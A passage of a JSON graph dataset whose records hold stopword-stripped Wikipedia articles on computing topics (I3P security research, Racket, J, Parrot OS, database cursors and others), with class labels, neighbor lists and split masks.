development case studies show software developers usable security integrated organization software development process consequently i3p begun usable security project using uniform study methodology project document usable security three different organizations results used understand key usable security problems addressed teach developers solutions enable researchers perform comparable studies nation critical infrastructure threat cyber attack today never main response cyber threat facing country increased information sharing traditionally agencies store data data bases information readily available others might benefit obama administration made clear strategy work – data must readily available sharing preferred way would using cloud numerous government agencies would store information information would available appropriate credentials model tremendous added benefits – associated risks researchers rand university virginia took challenge answering question information sharing project privacy digital era researchers five i3p academic institutions engaged sweeping effort understand privacy digital era course 18 months research project take multidisciplinary look privacy examining roles human behavior data exposure policy expression way people understand protect privacy leveraging human behavior reduce cyber security risk project brings behavioral-sciences lens security examining interface human beings computers set rigorous empirical studies multi-disciplinary project draws together social scientists information security professionals illuminate intricacies human perceptions cognitions biases impact computer security project ’ goal leverage new insights way produces secure systems processes better security risk pricing i3p researchers project examined ways quantify cyber risk exploring potential multi-factor scoring system analogous risk scoring insurance sector overall work takes account two key determinants cyber risk technologies reduce likelihood attack internal capabilities respond successful potential attacks survivability recovery process control systems research project builds earlier i3p project control-systems security develop strategies enhancing control-system resilience allowing rapid recovery event successful cyber attack business rationale cyber security project offshoot earlier study economics security addresses challenge corporate decision-making comes investing cyber security attempted answer questions “ much needed ” “ much enough ” “ one measure return investment ” study includes investigation investment strategies including risks vulnerabilities supply-chain interdependencies technological fixes safeguarding digital identity multidisciplinary scope project addresses security digital identities emphasizing development technical approaches managing digital identities also meet political social legal needs work focused primarily two sectors privacy identity protection paramount financial services healthcare insider threat project addresses need detect monitor prevent insider attacks inflict serious harm organization researchers undertaken systematic analysis insider threat one addresses technical challenges also takes account ethical legal economic dimensions i3p delivered report titled national cyber security research development challenges industry academic government perspective u.s senators joseph lieberman susan collins february 18 2009 report reflects finding three forums hosted i3p 2008 brought together high-level experts industry government academia identify r opportunities would advance cyber security research next five 10 years report contains specific recommendations technology policy research reflect input participants also concerns public private sectors i3p connects engages stakeholders workshops outreach activities often held partnership organizations workshops encompass range topics directly related i3p research projects others intended bring right people together probe particularly difficult foundational challenge secure systems engineering workforce development i3p sponsored postdoctoral research fellowship program 2004-2011 provides funding year research i3p member institution competitive awards granted according merit proposed work extent proposed work explored creative original concepts potential impact topic u.s. information infrastructure prospective applicants expected address core area cyber security research including trustworthy computing enterprise security management secure systems engineering network response recovery identity management forensics wireless computing metrics well legal policy economic dimensions security",
    "neighbors": [
      1312,
      2558,
      1823
    ],
    "mask": "Test"
  },
  {
    "node_id": 2665,
    "label": 2,
    "text": "DOS_Wedge:dos wedge dos wedge popular piece commodore 64 system software written bob fairbairn included commodore cbm 1541 disk drive test/demo disk filename dos 5.1 also packaged c64 macro assembler filename dos wedge64 dos wedge referred 1541 drive manual dos support software startup screen dos manager original design developed bill seiler wedge made disk operations basic 2.0 significantly easier introducing several keyword shortcuts dos wedge became somewhat de facto standard third party vendors epyx often incorporating identical commands fastloader cartridges commodore 64 expansion devices compute gazette published several type-in variations dos wedge including c128 version february 1987 issue see external links original commodore dos wedge 1-kb program written mos 6502 assembly language resided otherwise unused memory block cc00– cfff 52224–53247 worked altering basic chrget subroutine 0073 115 character passing basic interpreter would checked wedge commands associated wedged-in routines run needed command contains symbol may substitute instead desired",
    "neighbors": [
      2786,
      2181,
      11494,
      8494,
      7983,
      7281,
      4764,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 2666,
    "label": 9,
    "text": "Racket_(programming_language):racket programming language racket general-purpose multi-paradigm programming language based scheme dialect lisp designed platform programming language design implementation addition core racket language racket also used refer family racket programming languages set tools supporting development racket racket also used scripting computer science education research racket platform provides implementation racket language including run-time system libraries jit compiler along drracket integrated development environment ide written racket racket used programbydesign outreach program aims turn computer science indispensable part liberal arts curriculum core racket language known extensive macro system enables creating embedded domain-specific languages language constructs classes modules separate dialects racket different semantics platform distribution free open-source software distributed gnu lesser general public license lgpl extensions packages written community may uploaded racket package catalog matthias felleisen founded plt mid 1990s first research group soon project dedicated producing pedagogic materials novice programmers lectures exercises/projects software january 1995 group decided develop pedagogic programming environment based scheme matthew flatt cobbled together mred original virtual machine racket libscheme wxwidgets free systems years followed team including flatt robby findler shriram krishnamurthi cormac flanagan many others produced drscheme programming environment novice scheme programmers research environment soft typing main development language drscheme supported named plt scheme parallel team began conducting workshops high school teachers training program design functional programming field tests teachers students provided essential clues directing development following years plt added teaching languages algebraic stepper transparent read–eval–print loop constructor-based printer many innovations drscheme producing application-quality pedagogic program development environment 2001 core team felleisen findler flatt krishnamurthi also written published first textbook design programs based teaching philosophy racket manifesto details principles driving development racket presents evaluation framework behind design process details opportunities future improvements first generation plt scheme revisions introduced features programming large modules classes version 42 introduced units – first-class module system – complement classes large scale development class system gained features e.g java-style interfaces also lost several features e.g multiple inheritance throughout versions language evolved throughout number successive versions gaining milestone popularity version 53 leading extensive work following version 100 would equivalent 1.0 release current popular version systems next major revision named version 200 introduced new default module system cooperates macros particular module system ensures run-time compile-time computation separated support tower languages unlike units modules first-class objects version 300 introduced unicode support foreign library support refinements class system later 300 series improved performance language runtime addition jit compiler switch default generational garbage collection next major release project switched conventional sequence-based version numbering version 4.0 introduced codice_1 shorthand specify language module written revision introduced immutable pairs lists support fine-grained parallelism statically-typed dialect june 7 2010 plt scheme renamed racket renaming coincided release version 5.0 subsequently graphical user interface gui backend rewritten racket c++ version 5.1 using native ui toolkits platforms version 5.2 included background syntax checking tool new plotting library database library new extended repl version 5.3 included new submodule feature optionally loaded modules new optimization tools json library features version 5.3.1 introduced major improvements drracket background syntax checker turned default new documentation preview tool added version 6.0 racket released second-generation package management system part development principal drracket racket repository reorganized split large set small packages making possible install minimal racket install packages needed version 7 racket released new macro expander written racket part preparations supporting moving chez scheme runtime system supporting multiple runtime systems racket core language includes macros modules lexical closures tail calls delimited continuations parameters fluid variables software contracts green os threads language also comes primitives eventspaces custodians control resource management enables language act like operating system loading managing programs extensions language created powerful macro system together module system custom parsers control aspects language unlike programming languages lack macro systems language constructs racket written base language using macros include mixin class system component module system expressive ml opaque ascription pattern matching language features first contract system higher-order programming language racket contract system inspired design contract work eiffel extends work higher-order values first-class functions objects reference cells example object checked contract ensured make contract checks methods eventually invoked racket includes bytecode jit jit compilers bytecode compiler translates internal bytecode format run racket virtual machine jit compiler translating bytecode native code x86 x86-64 arm powerpc platforms runtime since 2004 language also shipped planet package manager integrated module system third-party libraries transparently imported used also planet built-in versioning policy prevent dependency hell end 2014 much racket code moved new packaging system separate main code base new packaging system serviced client program named raco new package system provides fewer features planet blog post jay mccarthy racket blog explains rationale change duplicate older system features clearly distinguish racket languages lisp family integrated language extensibility features support building new domain-specific general-purpose languages racket extensibility features built module system allow context-sensitive module-level control syntax example codice_2 syntactic form overridden change semantics function application similarly codice_3 form allows arbitrary static analysis entire module since module used language via codice_1 notation effectively means virtually aspect language programmed controlled module-level extensibility features combined scheme-like hygienic macro system provides features lisp s-expression manipulation system scheme 84 hygienic extend-syntax macros r5rs syntax-rules indeed fair say macro system carefully tuned application programming interface api compiler extensions using compiler api programmers add features entire domain-specific languages manner makes completely indistinguishable built-in language constructs macro system racket used construct entire language dialects includes typed racket gradually typed dialect racket eases migration untyped typed code lazy racket—a dialect lazy evaluation hackett combines haskell racket pedagogical programming language pyret originally implemented racket. ref name= index 2017 /ref dialects include frtime functional reactive programming scribble documentation language slideshow presentation language several languages education racket core distribution provides libraries aid process constructing new programming languages languages restricted s-expression based syntax addition conventional readtable-based syntax extensions racket codice_1 makes possible language programmer define arbitrary parser example using parser tools library see racket logic programming example language language platform provides self-hosted ide named drracket continuation-based web server graphical user interface tools racket also viable scripting tool used scripting unix shell parse command line arguments execute external tools includes libraries like common scripting languages drracket formerly drscheme widely used among introductory computer science courses teach scheme racket lauded simplicity appeal beginner programmers ide originally built use teachscheme project programbydesign outreach effort northeastern university number affiliated universities attracting high school students computer science courses college level editor provides source highlighting syntax run-time errors parenthesis matching debugger algebraic stepper student-friendly features include support multiple language levels beginning student intermediate student also integrated library support sophisticated analysis tools advanced programmers module-oriented programming supported module browser contour view integrated testing coverage measurements refactoring support provides integrated context-sensitive access extensive hyper-linked help system named help desk drracket available windows macos unix linux x window system programs behave similarly platforms trivial hello world program running program produces output slightly less trivial program program taken racket website draws sierpinski triangle nested depth 8 using codice_1 directive source file written different dialects racket example factorial program typed racket statically typed dialect racket apart basis programming language theory racket designed used general-purpose language production systems thus racket distribution features extensive library covers systems network programming web development uniform interface underlying operating system dynamic foreign function interface several flavours regular expressions lexer/parser generators logic programming complete gui framework racket several features useful commercial language among ability generate standalone executables windows macos unix profiler debugger included integrated development environment ide unit testing framework racket used commercial projects web applications notable example hacker news website runs arc developed racket naughty dog used scripting language several video games racket used teach students algebra game design bootstrap program",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      6160,
      2577,
      7184,
      9749,
      8728,
      2585,
      4122,
      4633,
      8226,
      5677,
      3119,
      9780,
      2105,
      3132,
      6717,
      7234,
      8258,
      8771,
      10819,
      8262,
      1613,
      9299,
      9304,
      10841,
      3675,
      7267,
      2660,
      8293,
      5751,
      7805,
      9345,
      1159,
      5255,
      1673,
      9865,
      6797,
      9875,
      9877,
      5783,
      155,
      5803,
      2225,
      7347,
      7867,
      4799,
      5830,
      9926,
      7880,
      6345,
      8908,
      205,
      5837,
      7889,
      219,
      5852,
      10463,
      7392,
      225,
      7904,
      11488,
      10469,
      11495,
      5356,
      9964,
      4846,
      8430,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      8700,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      1301,
      791,
      10012,
      3869,
      5917,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      11255,
      823,
      311,
      6969,
      8000,
      11589,
      3408,
      6994,
      1365,
      3413,
      2392,
      10584,
      1889,
      10083,
      6502,
      11625,
      2417,
      5492,
      3446,
      1399,
      10104,
      377,
      4992,
      11141,
      3462,
      6536,
      7562,
      1931,
      11674,
      6556,
      6047,
      1952,
      8609,
      4516,
      5031,
      1448,
      5033,
      5546,
      9128,
      8116,
      7616,
      5569,
      6594,
      963,
      4550,
      5067,
      5585,
      11218,
      11219,
      9175,
      10712,
      3034,
      9701,
      2537,
      3051,
      5611,
      5612,
      499,
      7670,
      7671,
      2556
    ],
    "mask": "Test"
  },
  {
    "node_id": 2667,
    "label": 9,
    "text": "OpenMusic:openmusic openmusic om object-oriented visual programming environment musical composition based common lisp may also used all-purpose visual interface lisp programming specialized level set provided classes libraries make convenient environment music composition openmusic last series computer-assisted composition software designed ircam versions openmusic currently available mac os x powerpc intel windows linux source code released gnu lesser general public license lgpl programs openmusic created connecting together process known 'patching either pre-defined user-defined modules similar manner graphical signal-processing environments max/msp pd unlike environments however result openmusic computation typically displayed conventional music notation directly manipulated required via editor substantial body specialized libraries contributed users extends openmusic functionality areas constraint programming aleatoric composition spectral music minimalist music music theory fractals music information retrieval sound synthesis etc",
    "neighbors": [
      4865,
      2691,
      2438,
      9865,
      6797,
      2062,
      10256,
      9877,
      4122,
      1448,
      9128,
      10153,
      4779,
      8883,
      823,
      6969,
      6201,
      7867,
      8258,
      8771,
      4550,
      8262,
      11083,
      8908,
      1613,
      9299,
      1365,
      2392,
      7769,
      7896,
      6493,
      7267,
      3176,
      9210,
      8700,
      4606
    ],
    "mask": "Test"
  },
  {
    "node_id": 2668,
    "label": 5,
    "text": "Virtual_concatenation:virtual concatenation virtual concatenation vcat inverse multiplexing technique creating large capacity payload container distributed multiple smaller capacity tdm signals signals may transported routed independently virtual concatenation defined sonet/sdh otn pdh path signals alternate sonet/sdh concatenation techniques contiguous concatenation arbitrary concatenation virtual concatenation considered primary enhancement voice optimized sonet/sdh order support transport variable bit data streams recent sonet/sdh enhancements include link capacity adjustment scheme lcas generic framing procedure gfp conjunction lcas gfp virtual concatenation gives advantage splitting required bandwidth equally among set number sub paths called virtual tributaries vt virtual concatenation specified itu-t recommendations g.707 2007 g.783 2006 virtual concatenation used split sonet/sdh bandwidth right-sized groups virtually concatenated groups used support different customers services bill accordingly vcat works across existing infrastructure significantly increase network utilization effectively spreading load across whole network sonet/sdh hierarchical network level payloads concatenation lower-order payloads example sts192 10 gbit/s payload consists four oc48 2.5 gbit/s payloads concatenated together vcat sts192 payload could consist number virtually concatenated groups 192 non-contiguous sts1 51 mbit/s payloads sts1 within group may provisioned different parts network vcat supports high-order paths low-order tributary paths path within group approximately 51 mbit/s sts1/vc3 155 mbit/s sts3c/vc4 bandwidth allocated using h4 byte within path overhead bandwidth allocated multiples 51 mbit/s therefore high-order vcat used provision sub-rate traffic across gigabit ethernet makes high-order vcat ideal metro application path within group approximately 1.5 mbit/s vt1.5/vc11 2 mbit/s vt2/vc12 bandwidth allocated using z7/k4 byte within path overhead bandwidth allocated 2-mbit/s chunks therefore low-order vcat used provision sub-rate traffic across 10/100-mbit/s ethernet used access network several virtual tributaries form part virtual concatenation group vcg virtual tributaries transport data across vcat enabled network may many cases particularly underlying network relatively congested cost less finding one path meets required capacity splitting paths often finds shorter paths channel traffic virtual concatenation protocol performs content delivery process called byte-interleaving example given wish provision gigabit ethernet n 1gbit/s service would provision across 7 sts-nc vt ’ vcg members carry bandwidth equivalent v n/k bits/second case n 1gb k 7 typically happens data interleaved first byte put onto vt1 second byte put onto vt2 seventh byte put onto vt7 process repeats beginning eighth byte sent vt1 vcat helps providing services lower cost quickly contiguous concatenation however creates differential delay whereby path created represented vt different propagational delay across network difference delays called differential delay major problem differential delay requirement high speed buffers receiving node store incoming information paths converge buffer space b equated bandwidth delay product b n d. thus virtually concatenated connection requires b bits buffer space need buffer space eventually increases network cost important select paths minimize differential delay directly proportional buffer space required several heuristics based algorithms exist attempt minimize differential delay provide solution simple problem tackle referred mathematically np-complete problem set exists known algorithm finds optimum solution terminates polynomial time constraint",
    "neighbors": [
      3168,
      1977,
      10558,
      7478
    ],
    "mask": "None"
  },
  {
    "node_id": 2669,
    "label": 1,
    "text": "Cursor_(databases):cursor databases computer science database cursor control structure enables traversal records database cursors facilitate subsequent processing conjunction traversal retrieval addition removal database records database cursor characteristic traversal makes cursors akin programming language concept iterator cursors used database programmers process individual rows returned database system queries cursors enable manipulation whole result sets scenario cursor enables sequential processing rows result set sql procedures cursor makes possible define result set set data rows perform complex logic row row basis using mechanics sql procedure also define result set return directly caller sql procedure client application cursor viewed pointer one row set rows cursor reference one row time move rows result set needed use cursors sql procedures need following work cursors must use following sql statements section introduces ways standard defines use cursors applications embedded sql application bindings relational database systems adhere standard cli jdbc use different interface programmer makes cursor known dbms using codice_1 ... codice_2 statement assigning cursor compulsory name code access data must open cursor codice_3 statement directly following successful opening cursor positioned first row result set applications position cursors specific row result set codice_4 statement fetch operation transfers data row application application processed available rows fetch operation positioned non-existing row compare scrollable cursors dbms returns sqlstate '02000 usually accompanied +100 indicate end result set final step involves closing cursor using codice_5 statement closing cursor program open implies dbms re-evaluates query different query builds new result set programmers may declare cursors scrollable scrollable scrollability indicates direction cursor move non-scrollable forward-only cursor codice_4 row cursor automatically moves next row fetch last row fetch put cursor last row get following code sqlstate 02000 sqlcode +100 program may position scrollable cursor anywhere result set using codice_4 sql statement keyword scroll must specified declaring cursor default codice_8 although different language bindings like jdbc may apply different default target position scrollable cursor specified relatively current cursor position absolutely beginning result set scrollable cursors potentially access row result set multiple times thus data modifications insert update delete operations transactions could affect result set cursor sensitive insensitive data modifications sensitive cursor picks data modifications affecting result set cursor insensitive cursor additionally cursor may insensitive case dbms tries apply sensitivity much possible cursors usually closed automatically end transaction i.e commit rollback implicit termination transaction occurs behavior changed cursor declared using hold clause default without hold holdable cursor kept open commit closed upon rollback dbms deviate standard behavior also keep holdable cursors open rollback commit occurs holdable cursor positioned next row thus positioned update positioned delete statement succeed fetch operation occurred first transaction note jdbc defines cursors holdable per default done jdbc also activates auto-commit per default cursors used fetch data dbms application also identify row table updated deleted sql:2003 standard defines positioned update positioned delete sql statements purpose statements use regular clause predicates instead cursor identifies row cursor must opened already positioned row means codice_4 statement cursor must operate updatable result set order successfully execute positioned update delete statement otherwise dbms would know apply data changes underlying tables referred cursor using cursors distributed transactions x/open xa environments controlled using transaction monitor different cursors non-distributed transactions one pay attention using holdable cursors however connections used different applications thus transaction ended committed subsequent transaction running different application could inherit existing holdable cursors herefore application developer aware situation xquery language allows cursors created using subsequence function format result result initial xquery start item number start item-count number items return equivalently also done using predicate codice_10 end sequence complete examples see following information may vary depending specific database system fetching row cursor may result network round trip time uses much network bandwidth would ordinarily needed execution single sql statement like delete repeated network round trips severely reduce speed operation using cursor dbmss try reduce effect using block fetch block fetch implies multiple rows sent together server client client stores whole block rows local buffer retrieves rows buffer exhausted cursors allocate resources server locks packages processes temporary storage example microsoft sql server implements cursors creating temporary table populating query result set cursor properly closed deallocated resources freed sql session connection closed wasting resources server lead performance degradations failures employees table",
    "neighbors": [
      3076,
      10632,
      8201,
      8979,
      2068,
      10389,
      7446,
      11030,
      2456,
      1049,
      5658,
      5403,
      9112,
      10137,
      4255,
      9248,
      9631,
      9634,
      1447,
      2344,
      4263,
      7080,
      10793,
      10413,
      10286,
      9397,
      3004,
      1341,
      7868,
      11324,
      10048,
      2369,
      5953,
      6850,
      2246,
      9286,
      2632,
      9290,
      8788,
      2901,
      10069,
      7767,
      10326,
      987,
      2780,
      734,
      736,
      4065,
      10849,
      9828,
      10340,
      10471,
      8808,
      6124,
      7022,
      6383,
      2544,
      5104,
      10737,
      9075,
      7412,
      6775,
      1146,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 2670,
    "label": 9,
    "text": "J_(programming_language):j programming language j programming language developed early 1990s kenneth e. iverson roger hui synthesis apl also iverson fp fl function-level languages created john backus avoid repeating apl special-character problem j uses basic ascii character set resorting use dot colon inflections form short words similar digraphs primary primitive j words serve mathematical symbols dot colon extending meaning basic characters available also many characters languages often must paired codice_1 codice_2 treated j stand-alone words inflected single-character roots multi-character words j terse array programming language suited mathematical statistical programming especially performing operations matrices also used extreme programming network performance analysis like original fp/fl languages j supports function-level programming via tacit programming features unlike languages support object-oriented programming j flexible hierarchical namespace scheme every name exists specific locale effectively used framework class-based prototype-based object-oriented programming since march 2011 j free open-source software gnu general public license version 3 gplv3 one may also purchase source negotiated license j permits point-free style function composition thus programs terse considered difficult read programmers hello world program j implementation hello world reflects traditional use j – programs entered j interpreter session results expressions displayed also possible arrange j scripts executed standalone programs might look unix system historically apl used codice_3 indicate fold codice_4 equivalent codice_5 meanwhile division represented classic mathematical division symbol obelus ÷ implemented overstriking minus sign colon ebcdic ascii paper text terminals ascii general support overstrikes device-independent way include division symbol per se j uses represent division visual approximation reminder illustrates something mnemonic character j tokens quandaries imposed use ascii defining j function named codice_6 calculate average list numbers yields test execution function codice_7counts number items array.codice_8sums items array.codice_9divides sum number items avg defined using train three verbs codice_10 codice_11 codice_12 termed fork specifically codice_13 codice_14 shows power j v0 v1 v2 denote verbs ny denotes noun examples using codice_6 rank crucial concept j significance j similar significance codice_16 sql codice_17 c. implementing quicksort j dictionary yields following implementation quicksort demonstrating tacit programming later involves composing functions together referring explicitly variables j support forks hooks dictates rules arguments applied function applied component functions sorting j usually accomplished using built-in primitive verbs codice_18 sort codice_19 sort user-defined sorts quicksort typically illustration following example demonstrates usage self-reference verb codice_20 recursively calculate fibonacci numbers recursion also accomplished referring verb name although course possible verb named following expression exhibits pi n digits demonstrates extended precision abilities j j supports three simple types numeric variants one j numeric types bit two bit values 0 1 also bits formed lists example codice_21 list eight bits syntactically j parser treats one word space character recognized word-forming character would otherwise numeric words lists arbitrary length supported j supports usual binary operations lists exclusive rotate shift etc example j also supports higher order arrays bits formed two-dimensional three-dimensional etc arrays operations perform equally well arrays numeric types include integer e.g. 3 42 floating point 3.14 8.8e22 complex 0j1 2.5j3e88 extended precision integer 12345678901234567890x extended precision rational fraction 1r2 3r4 bits formed lists arbitrarily dimensioned arrays bits operations performed numbers array lists bits converted integer using codice_22 verb integers converted lists bits using codice_23 verb parsing j codice_24 period codice_25 colon word-forming characters never tokens alone unless preceded whitespace characters j also supports literal character type literals enclosed quotes example codice_26 codice_27 lists literals also supported using usual convention putting multiple characters quotes codice_28 typically individual literals 8-bits wide ascii j also supports literals unicode numeric boolean operations supported literals collection-oriented operations rotate supported finally boxed data type typically data put box using codice_29 operation left argument left argument would less operation analogous c codice_30 operation left argument however result c codice_30 reference semantics result j codice_29 value semantics words codice_29 function produces result result 0 dimensions regardless structure contained data viewpoint j programmer codice_29 puts data box allows working array boxes assembled boxes and/or copies made box collection type offered j arbitrarily dimensioned array algorithms expressed concisely using operations arrays j arrays homogeneously typed example list codice_35 list integers despite codice_36 bit part sorts type issues transparent programmers certain specialized operations reveal differences type example list codice_37 would treated exactly operations list codice_38 j also supports sparse numeric arrays non-zero values stored indices efficient mechanism relatively values non-zero j also supports objects classes artifact way things named data types instead boxed literals used refer objects classes j data value semantics objects classes need reference semantics another pseudo-type—associated name rather value—is memory mapped file j documentation includes dictionary words j identified nouns verbs modifiers primary words listed vocabulary respective parts speech indicated using markup note verbs two forms monadic arguments right dyadic arguments left right example 'codice_39 hyphen monadic verb 'codice_40 hyphen dyadic verb monadic definition mostly independent dyadic definition regardless whether verb primitive verb derived verb j provides control structures details similar procedural languages prominent control words category include",
    "neighbors": [
      7684,
      2181,
      1673,
      9993,
      6797,
      6160,
      5395,
      3733,
      6933,
      1178,
      667,
      8987,
      5917,
      1826,
      2216,
      10668,
      10413,
      7983,
      5168,
      2045,
      823,
      1976,
      4921,
      9019,
      963,
      10819,
      8262,
      1099,
      7630,
      11219,
      5588,
      11221,
      2519,
      4057,
      5081,
      1883,
      11099,
      1887,
      9825,
      4069,
      11625,
      4331,
      5612,
      5492,
      8695,
      505,
      3323,
      2557
    ],
    "mask": "Test"
  },
  {
    "node_id": 2671,
    "label": 4,
    "text": "Parrot_OS:parrot os parrot linux linux distribution based debian focus computer security designed penetration testing vulnerability assessment mitigation computer forensics anonymous web browsing developed frank ruben aqua skid parrotsec intended provide suite penetration testing tools used attack mitigation security research forensics vulnerability assessment parrot based debian testing branch buster custom linux 4.19 kernel follows rolling release development model desktop environment mate default display manager lightdm project certified run devices minimum 256mb ram suitable 32-bit i386 64-bit amd64 processor architectures moreover project available armv7 armhf architectures even offers edition 32-bit 64-bit developed specifically servers carry cloud service penetration testing june 2017 parrotsec announced considering change debian devuan mainly problems highly controversial systemd january 21st 2019 parrot linux team phasing development 32-bit i386 versions future operating systems parrot multiple editions based upon debian various desktop environments available parrot home special edition parrot designed daily use targets regular users need lightweight always updated beautiful system laptops workstations distribution look feel regular parrot environment includes basic programs daily work parrot home also includes programs chat privately people encrypt documents highest cryptographic standards surf net completely anonymous secure way system also used starting point build customized pentesting platform tools need use build professional workstation taking advantage latest powerful technologies debian without hassle lightweight parrot release embedded systems aimed simplicity portability supported hardware brands raspberry pi orange pi pine64 cubieboard development team specified official release timeline based release changelogs notes included official review distribution project released monthly basis",
    "neighbors": [
      4611,
      3079,
      3089,
      4113,
      8209,
      8727,
      543,
      11297,
      7204,
      9253,
      11305,
      56,
      3129,
      4153,
      59,
      7228,
      8248,
      9276,
      4673,
      3654,
      5190,
      3147,
      2125,
      1107,
      1110,
      89,
      5721,
      4192,
      3685,
      9319,
      10860,
      5742,
      2671,
      11388,
      2692,
      8837,
      9353,
      9873,
      11410,
      8857,
      10394,
      6301,
      10397,
      5279,
      673,
      3745,
      1700,
      5284,
      7332,
      7845,
      10920,
      9899,
      3245,
      7854,
      2738,
      4790,
      4279,
      10425,
      2239,
      9407,
      2763,
      8907,
      3791,
      6352,
      7385,
      11481,
      4841,
      6890,
      7913,
      5356,
      6380,
      9964,
      7920,
      6898,
      5363,
      9461,
      1782,
      6393,
      5369,
      8957,
      4355,
      5380,
      7435,
      2321,
      6934,
      4887,
      8992,
      10530,
      6436,
      2853,
      3369,
      7989,
      823,
      3387,
      7483,
      3903,
      11587,
      2375,
      5959,
      9048,
      8033,
      2914,
      5990,
      9064,
      7020,
      7534,
      11121,
      9074,
      11648,
      390,
      1416,
      905,
      10127,
      912,
      11669,
      10646,
      926,
      9119,
      10149,
      6055,
      7082,
      9646,
      1455,
      948,
      439,
      10694,
      4039,
      5067,
      975,
      9689,
      2010,
      9693,
      4580,
      485,
      495,
      8177,
      8180,
      5110,
      2558,
      11263
    ],
    "mask": "Validation"
  },
  {
    "node_id": 2672,
    "label": 2,
    "text": "CMD_file_(CP/M):cmd file cp/m cp/m-86 concurrent cp/m-86 personal cp/m-86 s5-dos dos plus concurrent dos flexos multiuser dos system manager real/32 well scp1700 cp/k k8918-os cmd filename extension used cp/m-style executable programs corresponds com cp/m-80 exe dos extension used command-line interpreter cmd.exe os/2 windows batch files cmd file 128-byte header followed 1-8 groups code data group 1 megabyte size later versions format cmd files also contain relocation information resident system extensions rsxs start header lists groups present file types type used first 256 bytes data group must zero populated cp/m-86 zero page comparable program segment prefix dos data group first 256 bytes code group used instead os/2 windows nt .cmd file extension associated batch scripts command processor cmd.exe since binary code executed way attempting run cp/m-86 cmd files cmd command processor work typically cause mild inconvenience users executable loader relocator cp/m-86 related operating systems test first byte file happens type byte first table entry cp/m cmd file value 1 9 accepting valid cp/m cmd file ascii values smaller 10 rarely never used batch scripts scheme gives reasonably good protection",
    "neighbors": [
      10113,
      1922,
      6664,
      6921,
      6797,
      3216,
      3856,
      8976,
      2840,
      2201,
      2729,
      7849,
      11562,
      178,
      5557,
      4409,
      3386,
      7999,
      4548,
      9166,
      8529,
      3410,
      10067,
      10083,
      5220,
      4712,
      3056,
      4337,
      9329,
      2804,
      4727,
      11513,
      6778,
      2942,
      8959
    ],
    "mask": "Test"
  },
  {
    "node_id": 2673,
    "label": 2,
    "text": "Cocoa_Touch:cocoa touch cocoa touch ui framework building software programs run ios iphone ipod touch ipad watchos apple watch tvos fourth-generation apple tv apple inc. cocoa touch provides abstraction layer ios operating system iphone ipod touch ipad cocoa touch based macos cocoa api toolset like primarily written objective-c language cocoa touch allows use hardware features found macos computers thus unique ios range devices like cocoa cocoa touch follows model-view-controller mvc software architecture cocoa touch contains different set graphical control elements cocoa tools developing applications based cocoa touch included ios sdk ios watchos tvos technologies seen set layers cocoa touch highest level core os/kernel bottom hierarchical view ios watchos tvos technologies shown follows main features technologies cocoa touch cocoa touch provides key frameworks developing applications devices running ios key frameworks",
    "neighbors": [
      10755,
      9732,
      5647,
      7697,
      11289,
      6186,
      2603,
      4139,
      6700,
      1074,
      8754,
      9784,
      8253,
      8771,
      8783,
      4180,
      10838,
      1623,
      3672,
      10841,
      3681,
      9826,
      8806,
      3691,
      5743,
      8303,
      8304,
      9848,
      5754,
      7292,
      2686,
      6783,
      10878,
      1666,
      5784,
      1177,
      3228,
      2207,
      11430,
      2735,
      3248,
      4283,
      3772,
      7869,
      3286,
      4822,
      9430,
      3293,
      4318,
      6884,
      10470,
      9451,
      1772,
      7420,
      6403,
      1290,
      3338,
      784,
      10512,
      9490,
      9491,
      4888,
      5912,
      10023,
      4399,
      7983,
      7991,
      2363,
      2365,
      2366,
      9022,
      1346,
      1347,
      1348,
      10562,
      7496,
      4957,
      6495,
      9063,
      9579,
      3948,
      10608,
      2439,
      6023,
      6539,
      7052,
      3483,
      10654,
      2979,
      9128,
      8618,
      8109,
      2492,
      7614,
      446,
      4544,
      10176,
      2502,
      4550,
      456,
      1482,
      7629,
      7118,
      464,
      8662,
      9174,
      7133,
      3038,
      9182,
      4068,
      487,
      2023,
      7154
    ],
    "mask": "Test"
  },
  {
    "node_id": 2674,
    "label": 3,
    "text": "Scramble_Spirits:scramble spirits player starts propelled plane fire air-to-air twin machine guns air-to-ground rockets weapons used destroying waves enemy planes ground sea units main plane destroyed one hit certain enemy destroyed player collect comrade fighter fight alongside main plane two comrade fighters collected comrade fighters assigned fight air fire bullets assigned fight low altitude fire air-to-ground rockets comrade fighters also launched kamikaze attack explosion enemy kamikaze attacks comrade fighters retrievable lost shot crash enemy areas certain stages player fly lower altitude armed twin machine guns shooting parked planes turrets take limited amount damage multiple shots crashes end stage player must destroy boss vehicle proceed",
    "neighbors": [
      1776,
      10931,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 2675,
    "label": 9,
    "text": "Thomas_W._Reps:thomas w. reps thomas w. reps born 28 may 1956 united states american computer scientist known contributions automatic program analysis dr. reps professor computer science computer sciences department university wisconsin–madison joined 1985 reps author co-author four books one hundred seventy-five papers describing research work covered wide variety topics including program slicing data-flow analysis pointer analysis model checking computer security instrumentation computer programming language-based program-development environments use program profiling software testing software renovation incremental algorithms attribute grammars reps ’ current work focuses static analysis stripped binary executables methods that—without relying symbol-table debugging information—recover intermediate representations similar intermediate phases compiler creates program written high-level language goal provide disassembler decompiler platform analyst use understand workings cots components plugins mobile code dlls well memory snapshots worms virus-infected code reps president co-founder grammatech inc. reps recipient following awards",
    "neighbors": [
      1952,
      2051,
      4420,
      10762,
      10173,
      10703,
      7634,
      2041,
      7739,
      7421,
      2558
    ],
    "mask": "None"
  },
  {
    "node_id": 2676,
    "label": 2,
